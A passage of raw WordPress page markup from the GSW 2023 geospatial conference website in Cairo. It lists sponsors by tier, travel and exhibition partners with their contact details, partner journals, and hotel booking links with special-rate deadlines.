/></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h5>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145681361{margin-top: -85px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145657186{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\n<h1 style=\"text-align: center;\">Journals partner</h1>\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\n<h3></h3>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\n<h1 style=\"text-align: center;\">Journals partner</h1>\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\n<h3></h3>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is September 1, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692140427657{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\n<p><img 